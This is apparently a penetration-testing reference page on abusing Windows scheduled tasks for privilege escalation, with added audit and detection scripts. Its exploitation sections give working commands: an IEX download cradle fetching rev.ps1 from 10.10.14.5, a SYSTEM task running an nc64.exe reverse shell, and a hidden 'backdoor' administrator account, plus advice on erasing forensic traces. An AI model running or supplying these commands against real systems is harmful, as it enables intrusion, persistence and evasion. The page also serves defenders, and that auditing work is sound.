Scheduled Tasks Abuse

#Overview

Windows scheduled tasks execute commands at specified triggers with the privileges of their configured user account. When a scheduled task runs as SYSTEM or a high-privilege domain account and the underlying script or binary is writable by a low-privilege user, it becomes a privilege escalation vector. Scheduled tasks are the Windows equivalent of Linux cron jobs.

#Prerequisites

  • User-level shell access
  • Ability to read scheduled task configurations
  • Write access to a scheduled task's script, binary, or working directory

#Detection & Enumeration

```cmd
rem List all scheduled tasks with verbose output
schtasks /query /fo LIST /v

rem Filter for tasks running as SYSTEM
schtasks /query /fo LIST /v | findstr /i "SYSTEM"
rem Show only the command line each task runs (/c: matches the whole phrase, not any single word)
schtasks /query /fo LIST /v | findstr /i /c:"Task To Run"
```

```powershell
# PowerShell enumeration
Get-ScheduledTask | Where-Object {$_.Principal.UserId -eq "SYSTEM"} | Format-Table TaskName,State
Get-ScheduledTask | Get-ScheduledTaskInfo | Format-Table TaskName,LastRunTime,NextRunTime
```
```powershell
# Find writable scripts/binaries used by scheduled tasks
# Combine with PowerUp for systematic checking
. .\PowerUp.ps1
Get-ModifiableScheduledTaskFile

# Manual check: for each scheduled task, check permissions on its action path
$taskPath = (Get-ScheduledTask -TaskName "VulnTask").Actions[0].Execute
icacls $taskPath
```
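The manual check above covers one task at a time. The following audit script is an added example (not part of this module and not PowerUp's code): it walks every task that runs as SYSTEM or with the highest run level, resolves each action's executable the way the service would (environment variables expanded, bare names found through PATH), and reports whether the file, its directory, or the task's "Start In" working directory grants write rights to a low-privilege principal. It also lists each task's trigger types, so the logon/boot/daily distinction discussed later on this page is visible in the same table. The identity list and the rights mask are assumptions; adjust them for your environment.

```powershell
# Added audit example (not from the original module or from PowerUp): report SYSTEM /
# highest-run-level tasks whose action target, target directory, or working directory is
# writable by a low-privilege principal. Identity list and rights mask are assumptions.
$lowPrivIdentities = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)
# Any of these rights lets the holder change a file's contents or drop a file into a directory
$writeRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl -bor
               [System.Security.AccessControl.FileSystemRights]::WriteData -bor
               [System.Security.AccessControl.FileSystemRights]::AppendData

function Resolve-TaskActionPath {
    param([string]$Execute)
    # Expand %SystemRoot%-style variables and strip surrounding quotes
    $p = [Environment]::ExpandEnvironmentVariables($Execute).Trim('"')
    if (Test-Path -LiteralPath $p -PathType Leaf) { return (Resolve-Path -LiteralPath $p).Path }
    # A bare name such as cmd.exe is located through PATH, as the Task Scheduler service does
    $cmd = Get-Command $p -CommandType Application -ErrorAction SilentlyContinue | Select-Object -First 1
    if ($cmd) { return $cmd.Source }
    return $null
}

function Test-LowPrivWritable {
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivIdentities -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$writeRights) -ne 0) { return $true }
    }
    return $false
}

function Get-WritableSystemTaskTargets {
    foreach ($task in Get-ScheduledTask) {
        $runsAs   = $task.Principal.UserId
        $highPriv = ($runsAs -match '^(NT AUTHORITY\\)?SYSTEM$') -or
                    ($runsAs -eq 'LocalSystem') -or
                    ($task.Principal.RunLevel -eq 'Highest')
        if (-not $highPriv) { continue }
        # Trigger CIM classes are named MSFT_Task<Type>Trigger (Logon, Boot, Daily, Event, ...)
        $triggers = ($task.Triggers | ForEach-Object {
            $_.CimClass.CimClassName -replace '^MSFT_Task(.*)Trigger$', '$1' }) -join ','
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no executable
            $target = Resolve-TaskActionPath $action.Execute
            if (-not $target) { continue }
            $targetDir = Split-Path -Parent $target
            # "Start In" directory if set, otherwise the executable's own directory (DLL search origin)
            $workDir = if ($action.WorkingDirectory) {
                [Environment]::ExpandEnvironmentVariables($action.WorkingDirectory).Trim('"')
            } else { $targetDir }
            [pscustomobject]@{
                Task              = "$($task.TaskPath)$($task.TaskName)"
                RunsAs            = $runsAs
                Triggers          = $triggers
                Target            = $target
                TargetWritable    = Test-LowPrivWritable $target
                TargetDirWritable = Test-LowPrivWritable $targetDir
                WorkDirWritable   = Test-LowPrivWritable $workDir
            }
        }
    }
}

Get-WritableSystemTaskTargets |
    Where-Object { $_.TargetWritable -or $_.TargetDirWritable -or $_.WorkDirWritable } |
    Format-Table -AutoSize
```

Two caveats when reading the output: Get-ScheduledTask only returns tasks the calling account may read, so run the audit elevated to see everything; and the ACL test matches a fixed list of well-known groups rather than computing effective access, so a file writable through a custom group membership is not flagged. For a definitive answer on one path, run the check as the low-privilege account itself or inspect the full DACL with icacls as the page shows.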

#Exploitation / Execution

#Writable Scheduled Task Scripts/Binaries

```cmd
rem Check permissions on the task's executable
icacls "C:\Program Files\VulnApp\task_script.bat"
rem If W (write) or F (full) for your user:

rem Replace the script with a malicious one
echo powershell -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/rev.ps1')" > "C:\Program Files\VulnApp\task_script.bat"

rem Wait for the task to trigger, or manually run if you have permission:
schtasks /run /tn "\VulnApp\VulnTask"

rem Check last run time to confirm (/c: so findstr matches the phrase rather than any one word):
schtasks /query /fo LIST /v /tn "\VulnApp\VulnTask" | findstr /c:"Last Run Time"
```

#Scheduled Task Trigger Analysis

```cmd
rem View all triggers for a task
schtasks /query /fo LIST /v /tn "\TaskName"

rem Key trigger types:
rem - At logon: runs when any user logs on
rem - At startup: runs at system boot
rem - Daily/Weekly: runs at specific times
rem - On event: runs on specific event log entries

rem Tasks with "At logon" triggers are ideal -- log off and log back on to trigger
rem Tasks with "At startup" require a system reboot or shutdown /r /t 0
```

#Custom Task Creation with SYSTEM Privileges

When you have permissions to create new tasks:

```cmd
rem Create a task that runs as SYSTEM immediately
schtasks /create /tn "Privesc" /tr "C:\Windows\Temp\nc64.exe 10.10.14.5 4444 -e cmd" /sc ONCE /st 00:00 /ru SYSTEM /f
schtasks /run /tn "Privesc"

rem Create a task that runs at next logon (as SYSTEM)
schtasks /create /tn "LogonTask" /tr "cmd.exe /c net user backdoor Password123! /add && net localgroup administrators backdoor /add" /sc ONLOGON /ru SYSTEM
rem Log off and back on
```

#Writable Working Directory

When the task's working directory is writable:

```cmd
rem Some tasks reference DLLs relative to their working directory
rem If working dir is writable, you can DLL hijack the task

rem Check task's working directory (/c: so findstr matches the phrase "Start In")
schtasks /query /fo LIST /v /tn "\TaskName" | findstr /c:"Start In"

rem Or check the binary's directory
icacls "C:\Program Files\VulnApp"
rem If writable, create a malicious DLL in that directory
```

#CVE-2021-36942 (Task Scheduler DLL Injection)

This vulnerability allowed DLL injection into the Task Scheduler service itself:

```powershell
# Affected Windows versions where Task Scheduler loads DLLs from writable locations
# Check for writable directories in Task Scheduler's DLL search path
```

#Common Pitfalls

  • Assuming schtasks returns ALL tasks -- some tasks are stored in registry or configured via Task Scheduler XML
  • Not checking task trigger schedules -- a task set to run at 3 AM on Sundays may not trigger during your engagement
  • Writable scripts that run as SYSTEM but are in directories with proper ACLs -- check every parent directory
  • Reboot required for "At startup" triggers -- ensure you have SeShutdownPrivilege
  • Task modification may be reverted by Group Policy (GPO) -- check if the task is GPO-managed

#OPSEC Considerations

  • Querying scheduled tasks is normal system administration behavior.
  • Creating new tasks or modifying existing ones generates event log entries (event ID 106/140/141 in TaskScheduler log).
  • Replacing executables for scheduled tasks is detected by file integrity monitoring.
  • Tasks running nc64.exe or reverse shell commands are immediately suspicious and may trigger AV.
  • Restoring original files after exploitation reduces forensic evidence.
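The event IDs named above are the defender's starting point. The script below is an added detection example (not part of this module): it reads registration, update and deletion events from the Microsoft-Windows-TaskScheduler/Operational log (106 = task registered, 140 = task updated, 141 = task deleted), then re-inspects each task that still exists and flags those that run as SYSTEM or whose action command line matches patterns like the nc64.exe, IEX/DownloadString and net user commands shown in the exploitation sections. The regular expression and the 24-hour window are assumptions; tune them for your environment.

```powershell
# Added detection example (not from the original module): surface recent scheduled task
# changes and re-check the current definition of each changed task. The pattern list is
# an assumption based on the command lines this page describes.
$suspiciousAction = 'nc64?\.exe|DownloadString|IEX|-enc(odedcommand)?\b|net user .* /add|net localgroup administrators'

function Get-TaskSchedulerChanges {
    param([int]$Hours = 24)
    $filter = @{
        LogName   = 'Microsoft-Windows-TaskScheduler/Operational'
        Id        = 106, 140, 141     # 106 registered, 140 updated, 141 deleted
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    foreach ($event in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        # Read the named EventData fields instead of parsing the rendered message text
        $xml  = [xml]$event.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $change = switch ($event.Id) { 106 { 'registered' } 140 { 'updated' } 141 { 'deleted' } }
        # 106 records the registering account as UserContext; 140 and 141 use UserName
        $user = if ($data.ContainsKey('UserContext')) { $data['UserContext'] } else { $data['UserName'] }
        [pscustomobject]@{
            Time   = $event.TimeCreated
            Id     = $event.Id
            Change = $change
            Task   = $data['TaskName']
            User   = $user
        }
    }
}

function Get-SuspiciousTaskChanges {
    param([int]$Hours = 24)
    foreach ($change in Get-TaskSchedulerChanges -Hours $Hours) {
        if ($change.Id -eq 141) {
            # Nothing left to inspect; a deletion shortly after creation is itself worth a look
            [pscustomobject]@{ Time = $change.Time; Change = $change.Change; Task = $change.Task
                               User = $change.User; RunsAs = ''; Actions = ''; Reason = 'task deleted' }
            continue
        }
        # Task names in the log are full paths such as \VulnApp\VulnTask; the cmdlet wants them split
        $name = Split-Path $change.Task -Leaf
        $path = Split-Path $change.Task -Parent
        if (-not $path.EndsWith('\')) { $path += '\' }
        $task = Get-ScheduledTask -TaskName $name -TaskPath $path -ErrorAction SilentlyContinue
        if (-not $task) { continue }
        $runsAsSystem = $task.Principal.UserId -match 'SYSTEM'
        $cmdLines = foreach ($a in $task.Actions) { "$($a.Execute) $($a.Arguments)".Trim() }
        $hit = @($cmdLines | Where-Object { $_ -match $suspiciousAction }).Count -gt 0
        if (-not ($runsAsSystem -or $hit)) { continue }
        $reason = if ($hit) { 'suspicious action' } else { 'runs as SYSTEM' }
        [pscustomobject]@{
            Time    = $change.Time
            Change  = $change.Change
            Task    = $change.Task
            User    = $change.User
            RunsAs  = $task.Principal.UserId
            Actions = ($cmdLines -join ' ; ')
            Reason  = $reason
        }
    }
}

Get-SuspiciousTaskChanges -Hours 24 | Format-Table Time, Change, Task, User, RunsAs, Reason -AutoSize
```

Run it elevated so that both the operational log and every task definition are readable. The Microsoft-Windows-TaskScheduler/Operational log is disabled by default on current Windows releases; enable it with `wevtutil sl Microsoft-Windows-TaskScheduler/Operational /e:true` before relying on it. Where that log is not available, the Security log records the same lifecycle as 4698 (task created), 4699 (deleted), 4700/4701 (enabled/disabled) and 4702 (updated) once the "Audit Other Object Access Events" subcategory is turned on, and those events carry the full task XML, including the action command line.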

#Post-Exploitation Value

Scheduled task abuse provides persistent SYSTEM access because tasks can survive reboots. Tasks running as domain accounts with elevated privileges enable lateral movement. Custom SYSTEM tasks can execute credential dumpers, install backdoors, or disable security controls.

#Cross-References

#Tool References

| Tool | Link |
|---|---|
| PowerUp.ps1 | https://github.com/PowerShellMafia/PowerSploit |

#Source Machines

  • Generic Windows - Scheduled tasks with writable scripts running as SYSTEM